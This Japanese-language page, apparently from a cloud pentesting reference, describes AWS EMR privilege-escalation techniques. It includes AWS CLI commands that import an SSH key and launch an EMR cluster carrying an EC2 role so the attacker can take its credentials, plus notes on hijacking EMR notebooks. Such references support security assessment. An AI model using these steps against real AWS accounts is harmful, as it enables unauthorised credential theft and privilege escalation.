EMR

EMRに関する詳細情報 は以下を参照してください:

iam:PassRole, elasticmapreduce:RunJobFlow

これらの権限を持つ攻撃者は、EC2ロールをアタッチした新しいEMRクラスタを実行し、その資格情報を盗もうとすることができます。 これを行うには、アカウントにインポートされた いくつかのsshプライベートキーを知っている必要があるか、インポートする必要があり、マスターノードでポート22を開くことができる必要があります（これは、--ec2-attributes内の EmrManagedMasterSecurityGroup および/または ServiceAccessSecurityGroup 属性を使用して行うことができるかもしれませます）。

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

注意してください。--service-roleでEMRロールが指定され、InstanceProfile内の--ec2-attributesでec2ロールが指定されています。ただし、このテクニックはEC2ロールの資格情報を盗むことしかできません（ssh経由で接続するため）が、EMR IAMロールは盗むことができません。

潜在的な影響: 指定されたEC2サービスロールへの特権昇格。

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

これらの権限を持つ攻撃者はAWSコンソールに移動し、ノートブックを作成してアクセスし、IAMロールを盗むことができます。

潜在的な影響: arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfileへのAWS管理ロールの特権昇格

elasticmapreduce:OpenEditorInConsole

この権限だけで、攻撃者はJupyter Notebookにアクセスしてそれに関連するIAMロールを盗むことができます。 ノートブックのURLはhttps://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/です。

潜在的な影響: arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfileへのAWS管理ロールの特権昇格